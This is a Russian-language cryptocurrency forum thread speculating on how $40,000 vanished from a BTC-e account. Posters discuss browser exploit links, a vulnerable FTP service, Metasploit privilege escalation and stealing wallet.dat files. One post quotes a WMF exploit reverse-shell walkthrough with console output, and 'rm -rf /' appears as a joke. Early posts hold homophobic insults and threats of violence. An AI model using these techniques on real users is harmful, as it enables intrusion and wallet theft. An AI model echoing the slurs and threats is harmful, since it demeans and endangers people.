Topic: Пропали 40 К долларов на btc-e (Read 12034 times)

У меня приятель как-то с такими примерами по харе схлопотал, а потом обиделся как так.
Не то что обиделся, а типа вообще не понял за что.
Тогда еще не модно было быть либерастом и толерастом, но всетаки он заранее уже был толерастом, до того как это появилось в России и стало раскручиваться.
Есть вот такие **анутые толерасты которым нравится представлять что они девушка или их друг девушка.
Таким надо не то что въехать в **ало, а хорошенько въехать, чтобы и завтра вспомнил и подумал что наверно такую толерастию свою не стоит на людей переводить.
А вот так с виду никогда и не скажешь кто такой толератией страдает.

Это я к тому что если у тебя твое "предположим" ты с них таких мечт вздрачиваешься "чисто теоретически" на мужской пол, то держи свои сексуальные фантазии при себе, а то можно схватить уже и "чисто практически".

Т.е. " Я всегда мыслю и этого достаточно. А вы знакомы с понятием относительности? Вы привели пример дырки. Хорошо. Я тоже приведу. Вот, к примеру, есть Мр. Аноним и у него между ног есть дырка." - мысли куда-то в другую сторону если умеешь мыслить, кстати схватить в **ало это может быть еще и не худшим случаем, а лучшим вариантом, аккуратнее.

Хотя современные школьники все напрочь такие. Но это ничего не меняет, пару раз попадут в истории голова и прочистится от мечты быть девочкой или видеть в ком-то девочек.
А может и нет, не знаю, но как-то раньше другие пацаны были, без подобного дерьма.

Тем более когда не знаешь кому.

В следущий раз что-то такое придет в голову сказать - скажи браткам в 90ые:-) Я вот так сказал одному из далека не видел кто (как ты сейчас тоже же не знаешь кто такой анонимус), сдуру, а он второго привел, один мастер другой кмс и с оружием, в лесу. По счастливой случайности (они были пьяные и другое) удалось только немного быть помятым и убежать, а могло кончится куда хуже.

Да, кстати а этот самый приятель указаный выше перед этим как мне прогнатьту хероту что выше написана тоже бандитам в другой раз было какую-то херь прогонял не понятную, там один психованый был, у кого вся спина сгоревшая как голое мясо х.з. как умудрился, тот его пристрелить хотел не разобрав что тот сказал.

Так что думать надо аккуратней, и среди тех с кем общаешься тоже чтобы были люди кто думают аккуратно, а то вот так можно много чего надумать просто не того что нужно.

Asatur, когда здесь починишь разметку https://bitcointalksearch.org/topic/m.10585453 ?

Эксплойты вещь интересная и замечательная, и всязи сэтим надо быть очень аккуратным. Попробуй эксплойт на крановщиках. 

Или посылаешь, если женский пол, то письмо типа "я похудела на 10 кг поедая котлеты", а мужской пол, типа "Я увеличил хер сидя на диване" вот тебе потенциальные жертвы для эксперементов.

Не знаю я как взломать комп fsb4000, нашел только инфу как юзать эксплойты с коннектом к тебе с компа.
Чел должен браузером зайти по ссылке и тогда ты получаешь доступ.
Ссылка естественно может быть в фрейме или переадресацией, с адреса вида:
bitcointa.lk вместо bitcointalk.org
Кто через поисковик попадал на это дерьмо примазавшееся к реальному форуму?
И ведь поскуда постоянно его результаты высоко сверху находятся, бывало что и выше самого толка.
Кто дает гарантию что в этом дерьмоподмазе нет соответствующего эксплойта?
А потом появится новая тема пропал охуилион с биржи и своровала биржа.
А сколько человек попадают на этот говносайт? наверняка тысячи!

Там всё так же, только флуда меньше.

вот флуда то развели...

интересно, куда неожиданно пропал автор. обещал, что прям скоро биржа должна дать ему ответ и с тех пор ни слуха, ни духа
кто мониторит его тему на бтксеке, есть там что?

Черт, это все невероятно интересно, но не сейчас.

Yaremi, а к тебе дело есть. Прочти это https://bitcointalksearch.org/topic/m.10592752  и это https://bitcointalksearch.org/topic/m.10592828
и прокомментируй пожалуйста, а то ждем...

Или просто дай знать что нет смысла ждать ответа и тогда я конечно пойму, но ...

также ещё тут 5 битков ждут своего хозяина:

Bounty: I don't have many bitcoins to throw at this, but 5 BTC go to the first person who can remove the protection from the key below:

1NPHardFPnejsycvne2gvirm5MCr9gnAbf
PsV8XM6n5FvjonHPwwjzqvzA6UXruAAJfQ5VwbXFCJrSQEiQ4gyNNDhuYfL8JUBt6mxt

To sweeten the deal: the password is 14 characters long, with upper and lower case letters only, and contains at least one dictionary word.

 

Господа хацкеры! Чем без дела пиписьками меряться, вот призовое задание на 10 битков: http://habrahabr.ru/post/250339/

Кстати у меня есть паяльная лампа, я ей клетки для рабов раз в год дезинфицирую, чтобы пореже болели инфекционными заболеваниями, забочусь как никак))

алгоритм намного проще...
находим кто хочет меняться р2р...
дальше при помощи приватных ключей

все содержимое кошельков переводится на нужные кошели...
 

О, becool хорошо осваивает. так глядишь и новы утянет. Уже ближе.

Только FTP сервер должен стоять не у жертвы, а на сервере атакующего.

Насчет 10.0.0.1 и формат ц это из статьи скопировано, понятное дело что формат ц не работает, но так написали может для прикола и т.д.
10.0.0.1 это локальный адрес.

Почему я передергиваю насчет фтп сервиса?
а почему вы решили что эксплоит на указаный какой-то там фтп сервис дает только фтп доступ и только в папку определенную этим самым сервером?
Я вот не знаю о каком он сервере писал и какой именно эксплоит.
Поэтому вариант да, что в нем есть уязвимость экзек.
А почему нет? Можно же и такое допускать, что никогда не было ни одного фтп сервера или других програм сервисов с подобной уязвимостью? Я думаю были.

насчет фтп я написал что смотря куда этот фтп, да написал что вариант к всему диску если будет, опять же почему нет? Не было ни одного подобного сплойта для фтп сервера?
Да и кстати кто вообще сказал что у пользователя там именно папка отдельная для фтп а не весь жесткий?
Как было подано, так и написал по максимуму.
По сему:
"В вашем случае это гибрбриная атака ftp + psexec или share + psexec на исполнение файла, но тут об этом не говориться, ты голословен и не понимаешь о чем пишешь, эта атака направленна на 139 445 порты, а не на порт 7777"
Во первых тут и не говорится об отсутствии этого и не указывается каков там на самом деле тот самый фтп сервер.
И какова его уязвимость.
Во вторых а клиенту религия мешает расшарить весь диск в этом самом фтп сервере?
Он же ставить троекратно охереть сложный пароль, а еще фтп сервер сразу динамит на час того кто три раза ввел неправильно! Почему он должен думать что будет или есть уязвимость и поэтому не стоит расшаривать весь диск на запись?
Ты так говоришь словно это твой фтп сервер взламывают, где ты всё знаешь что не может быть того и этого и т.д.
Вот я например встречал что люди в локалке в DC++ расшаривают весь диск, чего парится?
Написано было надо побольше гигов чтобы нода тебя не пинала, ну так и как это сделать?
Ясен пень нужно расшарить весь диск C!!! Обязательно!!
Да, папка пользователя почему то при этом недоступна, грусть печаль(((
Но зато доступна папка программ филес например, или другие на диске ц, а там и пароли аськи которая держала каталог свой в програм филес. и почтовой программы возможно, и вот как раз тот самый вариант запуска через ярлычок любимой программы если бы уровень доступа был запись, а не чтение как в дц++

Насчет повышения уровня доступа спасибо за инфу, но...
В описаных выше случаях оно нахер не нужно, в том и дело.
Спереть утащить валет.дат можно и под пользовательскими правами.
или приват кей из него.
Проделать то самое на бирже что вначале темы писали можно тоже с пользовательскими правами.

Куда пропал ТС ? Написал бы что да как, а то все размыто.

Извини что обидел если или вызвал негодование, считай я другим написал это, автору темы как минимум.
Я как написал выше не спец, и только ознакамливаюсь с материалом.
Если ты можешь изложить поще и понятней, то может кому-то поможет.
Да это возможно для тебя кажется простейшим и понятным вариантом все знают и т.д.
Но уверяю тебя не понимают люди самого принципа откуда и как это берется.
Вот автор темы наверно много чего не знает как его могли "факнуть" кто-то кроме биржи.
Поэтому придумал что это биржа, потому что:
... и т.д. тут варианты в принципе похожие у всех, типа всё было сделано за пол минуты поэтому это биржа.
Если конечно имела места пропажа денег вообще.

Там было написано что-то вроде что порт 7777 это какого-то фтп сервера с уязвимостью, я и написал про это если так то как оно могло бы быть использовано людям показал, если оно реально так.

" чем ты говоришь что браузеры уязвины, что на порно сайтах есть ифреймы, может ты даш вырезку из муви 43 где говорят "ууу лазил по гиперссылкам на порносайтах, словил переполнение в браузере, у тебя вирусы" да ты дибил конченный ? думаешь этого не понимают ? ты не на форуме блондинок рассказывай сказки там."
Это ты так думаешь что тут все настолько же умные и знающие, я вижу что ты разбираешься.
Вот в том то и дело что не понимают, считай форум блондинок, да, потому что сейчас основная толпа занимается краниками и реф ссылками. Или торгуют на бирже. Почему они должны понимать?
И в чате бтце тоже мало кто что понимает, да есть люди понимают, есть, но как и тут ну пусть 10% таких как ты понимающих. А остальные "блондинки" которые между тем и создают тему:
"-биржа меня обокрала"
-только тебя? А как же другие? Мы слышали настоящие криптоговнобиржи всех обворовывают?
"-нет, эта меня и еще я видел 5 тем на форуме других людей"
-подробности пытался выяснить? Ведь ты кричишь 40к - серьезные деньги.
-нет, всё от и то должна сделать биржа, провести расследования, отыскать виновного и кастрировать, к провайдеру, ментам, поддержки емэйла я обращаться не намерян. Тут варианты "не хотят ничего делать" "мне дали какие-то циферки" и т.д.
-зачем ты сюда пишешь тогда тем более через неделю?
"-не ваше дело почему я сюда пишу, и почему через неделю, и объяснять вам ничего и разговаривать с вами я не намерян"

То есть как бы ты же понимаешь какого вида от кого этот тролинг дешевый от какого-то стандартного пиарасского школьника зарабатывающего на пиаре, и на кого был рассчитан?
Зря ты думаешь что тут все разбираются и все поняли что это тролль.
10% разбираются. 10% поняли.
Остальные повелись, "ведь это уже N раз пишут, я постоянно вижу такие темы"
Если бы все такие тут умные были как ты описываешь не блондинки, то даже попыток подобного трольского вброса бы не было.

оу да ладно hxxp://www.securitylab.ru/analytics/361827.php это та уязвисость что на скрине

что вы передегиваете какая командная строка речь идет о фтп достпупе с правами на закачку, или и то без них... вы знаете что по фтп файлы не исполняются ?

В вашем случае это гибрбриная атака ftp + psexec или share + psexec на исполнение файла, но тут об этом не говориться, ты голословен и не понимаешь о чем пишешь, эта атака направленна на 139 445 порты, а не на порт 7777

командная строка как в win так и nix квинтесенция доступа, особенно win до 2012 server так как повышение прав это 100%, в них после доступа к командоной строке все усилия сводятся к повышениею прав до root uid 0 gid 0 что тоже вполне реалистично... и что ты говоришь имеешь доступ к командой строке от админа можешь сделать format C:\, нет во первый не можешь, во вторых ты можешь предпринять все но не эту команду.

cntl + f ftp о чем ты говоришь ты понимаешь ? Kaht вспомни... повысить привелегии в системе имея доступ metsploit можно командой use priv или getsystem -h.

proof

hxxp://www.offensive-security.com/


rm -rf / и будет вам счать.


у меня не открывается ссылка =))) дайте vpn в вашу сеть.

читай весь трейд прежде чем постить и репостить... я прекрасно знаю о уязвиостях в браузерах, заметь это не уязвимость в ОС win или nix (пример "safari site:exploit-db.com"), так же широкое распротранение имеют сплойты в java которы эксплотируються как на win так и на всех nix ситемах при исплользывание metasploit допустим... use payload... да нахуя ты это пишешь ? о чем ты говоришь что браузеры уязвины, что на порно сайтах есть ифреймы, может ты даш вырезку из муви 43 где говорят "ууу лазил по гиперссылкам на порносайтах, словил переполнение в браузере, у тебя вирусы" да ты дибил конченный ? думаешь этого не понимают ? ты не на форуме блондинок рассказывай сказки там.

Сплойты на ftp да самый популярный демон это ftpd это linux как раз... единсвенный полуприватный сплойт есть на ftpd, спойты на ftp на вин тачках рабочие где я плачу, или вы про баги serv-u который давно не актуален.

p.s. Не удивлюсь что скоро в одном из форком найдут критическое переполнение.

Нет, тему как раз надо продолжать:-)
Только вот ее автор походу всетаки троль, и никто его не обкрадывал((
Автор всетаки не открывал каких то левых ссылок?
Просто если открываешь ссылки, то вариков воровства становится поболе.
Маша, смотри какой прикол: http://www.youtup.com/watch?v=A2C3b4jw8Ck
А там сплоит и загрузчик всего что сразу необходимо чтобы комп дальше уже сам искал своего хозяина пока он включен.


Да вот прикинь если в браузере уязвимость то при переходе по адресу происходит заливка и у тебя появляется шел.
В винде знаешь ли есть разные варианты загрузки автоматической, туева хуча кроме записи в службу.
Можно и в автозагрузку положить текущего пользователя, разве это требует прав более чем пользовательский шел?
(это если пользователь очень умный и запускал браузер не под админом, хотя большинство пользователей винды такие)
Ну это как пример.
А вообще конечно же сразу качается всё что необходимо сразу автоматически на будущее и рассовывается вовсюда куда только можно, доступ же появился уже.

ну он написал по сплоит фтп сервера, ну так так же заюзал и закинул файл куда нить для запуска.
Ну блин вы такую фигню говорите службу создать.
Нахрена такие сложности? Службу создать надо админские права вроде как в винде.
Может просто заменить путь и запускаемый файл у одного из его любимых ярлычков, если уж не вариант автозагрузки и т.д. стандартные?
ярлычок будет запсукать пограммульку которая на экран выводиться не будет, что-то там запускать и после уже запускать его любимую программульку. Вот и всё.
Поражаюсь с прикола получил доступ к жесткому, но ничего не сделаешь не запустишь в винде, вы чего?
Винда конечно ушла в чем-то вперед, но явно не настолько))

Ну и как бы админский доступ и чего-то там запуск и не нужен и вирусы никакие не нужны.
Сам напиши собственно ручно пограмму 5 строк делающую поиск по всем файлам и найденные wallet.dat отправляющую куда-то, и всё, нахрен вирусы?
Ну для случая с биржей у хакера другой софт соответственно собственоручно написаный, не 5 строк а не хера се, 200 наверно!))

Вот примерно вот так выглядит уже полученый через сплоит шелл:

Это вариант как тут было написано если стоит фтп сервер с уязвимостью и открытым портом.
Если портов не знаешь не открыты, сидит за натом и т.д., то сначала он должен получить ссылку или pdf файл или еще подобное, и когда он откроет это то ты увидешь такое:
Маша, смотри какой прикол: http://10.0.0.1:8080/ (прим. вообще-то тут должен быть внешний ip)

Юзвер заходи по ссылке (и если у него есть эта конкретная уязвимость в IE) в консоли мы должны увидеть вот что:

• HTTP Client connected from 10.0.0.2:1116, redirecting... - клиент соединился, его IP 10.0.0.2:1116, редирект
• HTTP Client connected from 10.0.0.2:1117, sending 1604 bytes of payload... - отправлено 1604 байт начинки (реверс-шелл тут)
• Got connection from 10.0.0.1:4321 <-> 10.0.0.2:1118 - установлено соединение (пайп с cmd удалённого компа)

Microsoft Windows XP ['?абЁп 5.1.2600]
(') ?RаЇRа жЁп ? cЄаRбRдв, 1985-2001.
C:\Documents and Settings\?¤¬Ё-Ёбва вRа\? ЎRзЁc бвR<>

О блин!, Это ещё что, скажете Вы - это командная строка удалённого компа того юзверя!
А что за абракадабра? - Это не та кодовая страница выбрана (у него русская винда стоит!) Щас проверим! chcp

C:\Documents and Settings\?¤¬Ё-Ёбва вRа\? ЎRзЁc бвR<>chcp
chcp
'?Єгй п ЄR¤Rў п бва -Ёж : 866
C:\Documents and Settings\?¤¬Ё-Ёбва вRа\? ЎRзЁc бвR<>

Точно это 866, поставим 1251 (виндовую, а не дос)

C:\Documents and Settings\?¤¬Ё-Ёбва вRа\? ЎRзЁc бвR<>chcp 1251
chcp 1251
'?Єгй п ЄR¤Rў п бва -Ёж : 1251
C:\Documents and Settings\Администратор\Рабочий стол>

О! Теперь всё по русски! Что делать в cmd чужого компа зависит от вашей фантазии, список команд смотрите в help по консольным командам windows. (format c: - жесть!)
Был разобран конкретный пример использования WMF-Эксплоита с начинкой реверс-шелла, ваши варианты могут быть другими.

Естественно у тех кто занимается этим профессионально есть и сразу автоматические паки того что делать в таком случае, да и на сайте висит не один сплоит, а сразу пак их.

Даже удивительно что есть тут люди кто думают что человек получивший в винде командную строку или доступ к файловой системе ничего не сделает и не стырит и т.д.

Ты понимаешь что заканачанный файл в твою файловую систему не будет запущен автоматически ? Ты понимаешь о чем говоришь ? не стаит пачт устраняющий уязвимость с этим портом порты не связанны со службами напрямую... вы это понимаете ?

эксплоит в интернете ходит..

ссылку на эксплойт и видео с применением на виртуалке твое видео!!!, если ты такой профи, или опять все на турнире на твоем любимом было?

перенести можно - да,
только не закрывайте тред, а то придется новую создавать..